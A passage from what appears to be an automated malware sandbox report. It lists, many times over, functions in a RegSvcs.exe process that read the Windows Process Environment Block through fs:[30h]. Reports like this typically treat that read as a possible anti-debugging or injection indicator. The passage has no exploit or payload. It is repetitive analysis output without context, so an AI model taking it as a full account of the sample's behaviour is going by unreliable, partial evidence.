                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170E3F0 mov eax, dword ptr fs:[00000030h]8_2_0170E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170E3F0 mov eax, dword ptr fs:[00000030h]8_2_0170E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170E3F0 mov eax, dword ptr fs:[00000030h]8_2_0170E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017263FF mov eax, dword ptr fs:[00000030h]8_2_017263FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179E3DB mov eax, dword ptr fs:[00000030h]8_2_0179E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179E3DB mov eax, dword ptr fs:[00000030h]8_2_0179E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179E3DB mov ecx, dword ptr fs:[00000030h]8_2_0179E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179E3DB mov eax, dword ptr fs:[00000030h]8_2_0179E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017943D4 mov eax, dword ptr fs:[00000030h]8_2_017943D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017943D4 mov eax, dword ptr fs:[00000030h]8_2_017943D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F83C0 mov eax, dword ptr fs:[00000030h]8_2_016F83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F83C0 mov eax, dword ptr fs:[00000030h]8_2_016F83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F83C0 mov eax, dword ptr fs:[00000030h]8_2_016F83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F83C0 mov eax, dword ptr fs:[00000030h]8_2_016F83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017AC3CD mov eax, dword ptr fs:[00000030h]8_2_017AC3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017763C0 mov eax, dword ptr fs:[00000030h]8_2_017763C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EE388 mov eax, dword ptr fs:[00000030h]8_2_016EE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EE388 mov eax, dword ptr fs:[00000030h]8_2_016EE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EE388 mov eax, dword ptr fs:[00000030h]8_2_016EE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016E8397 mov eax, dword ptr fs:[00000030h]8_2_016E8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016E8397 mov eax, dword ptr fs:[00000030h]8_2_016E8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016E8397 mov eax, dword ptr fs:[00000030h]8_2_016E8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171438F mov eax, dword ptr fs:[00000030h]8_2_0171438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171438F mov eax, dword ptr fs:[00000030h]8_2_0171438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016E826B mov eax, dword ptr fs:[00000030h]8_2_016E826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F4260 mov eax, dword ptr fs:[00000030h]8_2_016F4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F4260 mov eax, dword ptr fs:[00000030h]8_2_016F4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F4260 mov eax, dword ptr fs:[00000030h]8_2_016F4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017AA250 mov eax, dword ptr fs:[00000030h]8_2_017AA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017AA250 mov eax, dword ptr fs:[00000030h]8_2_017AA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01778243 mov eax, dword ptr fs:[00000030h]8_2_01778243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01778243 mov ecx, dword ptr fs:[00000030h]8_2_01778243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F6259 mov eax, dword ptr fs:[00000030h]8_2_016F6259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EA250 mov eax, dword ptr fs:[00000030h]8_2_016EA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016E823B mov eax, dword ptr fs:[00000030h]8_2_016E823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017002E1 mov eax, dword ptr fs:[00000030h]8_2_017002E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017002E1 mov eax, dword ptr fs:[00000030h]8_2_017002E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017002E1 mov eax, dword ptr fs:[00000030h]8_2_017002E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA2C3 mov eax, dword ptr fs:[00000030h]8_2_016FA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA2C3 mov eax, dword ptr fs:[00000030h]8_2_016FA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA2C3 mov eax, dword ptr fs:[00000030h]8_2_016FA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA2C3 mov eax, dword ptr fs:[00000030h]8_2_016FA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA2C3 mov eax, dword ptr fs:[00000030h]8_2_016FA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017002A0 mov eax, dword ptr fs:[00000030h]8_2_017002A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017002A0 mov eax, dword ptr fs:[00000030h]8_2_017002A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017862A0 mov ecx, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01770283 mov eax, dword ptr fs:[00000030h]8_2_01770283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01770283 mov eax, dword ptr fs:[00000030h]8_2_01770283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01770283 mov eax, dword ptr fs:[00000030h]8_2_01770283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E284 mov eax, dword ptr fs:[00000030h]8_2_0172E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E284 mov eax, dword ptr fs:[00000030h]8_2_0172E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172656A mov eax, dword ptr fs:[00000030h]8_2_0172656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172656A mov eax, dword ptr fs:[00000030h]8_2_0172656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172656A mov eax, dword ptr fs:[00000030h]8_2_0172656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F8550 mov eax, dword ptr fs:[00000030h]8_2_016F8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F8550 mov eax, dword ptr fs:[00000030h]8_2_016F8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01786500 mov eax, dword ptr fs:[00000030h]8_2_01786500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F25E0 mov eax, dword ptr fs:[00000030h]8_2_016F25E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172C5ED mov eax, dword ptr fs:[00000030h]8_2_0172C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172C5ED mov eax, dword ptr fs:[00000030h]8_2_0172C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172A5D0 mov eax, dword ptr fs:[00000030h]8_2_0172A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172A5D0 mov eax, dword ptr fs:[00000030h]8_2_0172A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E5CF mov eax, dword ptr fs:[00000030h]8_2_0172E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E5CF mov eax, dword ptr fs:[00000030h]8_2_0172E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F65D0 mov eax, dword ptr fs:[00000030h]8_2_016F65D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017145B1 mov eax, dword ptr fs:[00000030h]8_2_017145B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017145B1 mov eax, dword ptr fs:[00000030h]8_2_017145B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017705A7 mov eax, dword ptr fs:[00000030h]8_2_017705A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017705A7 mov eax, dword ptr fs:[00000030h]8_2_017705A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017705A7 mov eax, dword ptr fs:[00000030h]8_2_017705A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F2582 mov eax, dword ptr fs:[00000030h]8_2_016F2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F2582 mov ecx, dword ptr fs:[00000030h]8_2_016F2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E59C mov eax, dword ptr fs:[00000030h]8_2_0172E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01724588 mov eax, dword ptr fs:[00000030h]8_2_01724588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171A470 mov eax, dword ptr fs:[00000030h]8_2_0171A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171A470 mov eax, dword ptr fs:[00000030h]8_2_0171A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171A470 mov eax, dword ptr fs:[00000030h]8_2_0171A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177C460 mov ecx, dword ptr fs:[00000030h]8_2_0177C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171245A mov eax, dword ptr fs:[00000030h]8_2_0171245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017AA456 mov eax, dword ptr fs:[00000030h]8_2_017AA456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016E645D mov eax, dword ptr fs:[00000030h]8_2_016E645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EC427 mov eax, dword ptr fs:[00000030h]8_2_016EC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EE420 mov eax, dword ptr fs:[00000030h]8_2_016EE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EE420 mov eax, dword ptr fs:[00000030h]8_2_016EE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EE420 mov eax, dword ptr fs:[00000030h]8_2_016EE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01728402 mov eax, dword ptr fs:[00000030h]8_2_01728402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01728402 mov eax, dword ptr fs:[00000030h]8_2_01728402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01728402 mov eax, dword ptr fs:[00000030h]8_2_01728402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F04E5 mov ecx, dword ptr fs:[00000030h]8_2_016F04E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017244B0 mov ecx, dword ptr fs:[00000030h]8_2_017244B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F64AB mov eax, dword ptr fs:[00000030h]8_2_016F64AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177A4B0 mov eax, dword ptr fs:[00000030h]8_2_0177A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017AA49A mov eax, dword ptr fs:[00000030h]8_2_017AA49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F8770 mov eax, dword ptr fs:[00000030h]8_2_016F8770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01774755 mov eax, dword ptr fs:[00000030h]8_2_01774755
